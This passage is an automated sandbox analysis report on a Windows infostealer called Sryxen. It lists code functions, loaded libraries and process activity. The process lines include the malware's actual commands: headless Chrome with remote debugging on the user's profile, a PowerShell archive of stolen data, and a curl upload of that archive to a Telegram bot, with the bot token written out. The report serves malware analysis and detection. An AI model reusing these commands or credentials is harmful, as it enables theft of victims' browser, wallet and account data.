Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63C22A00_2_00007FF6F63C22A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65057200_2_00007FF6F6505720
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6329D600_2_00007FF6F6329D60
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F64E46D00_2_00007FF6F64E46D0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63681E00_2_00007FF6F63681E0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6578A8C0_2_00007FF6F6578A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65577C00_2_00007FF6F65577C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65435D00_2_00007FF6F65435D0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6583EE80_2_00007FF6F6583EE8
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6557A200_2_00007FF6F6557A20
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63B3A500_2_00007FF6F63B3A50
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F658264C0_2_00007FF6F658264C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F658E6C80_2_00007FF6F658E6C8
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6582E6C0_2_00007FF6F6582E6C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F658EC980_2_00007FF6F658EC98
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6582A5C0_2_00007FF6F6582A5C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F633D7A00_2_00007FF6F633D7A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F64E18600_2_00007FF6F64E1860
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65418C00_2_00007FF6F65418C0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F649D5A00_2_00007FF6F649D5A0
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F64A55300_2_00007FF6F64A5530
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6505E700_2_00007FF6F6505E70
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6555F000_2_00007FF6F6555F00
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF6F6321B80 appears 57 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF6F6308F60 appears 35 times
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: String function: 00007FF6F6488250 appears 35 times
Source: Sryxen-Built.exeStatic PE information: invalid certificate
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs Sryxen-Built.exe
Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@77/363@16/21
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F638A360 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Concurrency::details::WorkQueue::IsStructuredEmpty,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF6F638A360
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CCD83B-20D8.pmaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile created: C:\Users\user\AppData\Local\Temp\SryxenJump to behavior
Source: Sryxen-Built.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Sryxen-Built.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Sryxen-Built.exe, 00000000.00000002.1677578772.00007FF6F65B3000.00000002.00000001.01000000.00000003.sdmp, Sryxen-Built.exe, 00000000.00000000.1293056392.00007FF6F65B3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Sryxen-Built.exe, 00000000.00000002.1677578772.00007FF6F65B3000.00000002.00000001.01000000.00000003.sdmp, Sryxen-Built.exe, 00000000.00000000.1293056392.00007FF6F65B3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Sryxen-Built.exe, 00000000.00000003.1327847828.000002730012F000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1328766048.00000273002A9000.00000004.00000020.00020000.00000000.sdmp, JKGgiaA.db.0.dr, Login Data.6.dr, ADr9iBe.db.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\Sryxen-Built.exe "C:\Users\user\Desktop\Sryxen-Built.exe"
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2372,i,4177486499501083304,17077047075569281720,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2380 /prefetch:3
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2132,i,1055891612558840755,6060021882091044920,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:3
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip"
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6412 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6636 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2040,i,17832583879177316522,5632469504734258169,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6768 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=25424 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpuJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path "C:\Users\user\AppData\Local\Temp\Sryxen" -DestinationPath "C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip"Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Windows\System32\curl.exe curl -F "chat_id=7129133033" -F "document=@\"C:\Users\user\AppData\Local\Temp\user_SryxenRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --no-pre-read-main-dll --field-trial-handle=2372,i,4177486499501083304,17077047075569281720,262144 --disable-features=PaintHolding --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2380 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2132,i,1055891612558840755,6060021882091044920,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6412 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6636 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6968 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6768 --field-trial-handle=2088,i,5504172896121841493,1568757033744004475,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,14210214294222991142,3583806559030474698,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2040,i,17832583879177316522,5632469504734258169,262144 /prefetch:3
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Sryxen-Built.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Sryxen-Built.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Sryxen-Built.exeStatic file information: File size 3513696 > 1048576
Source: Sryxen-Built.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2b2000
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
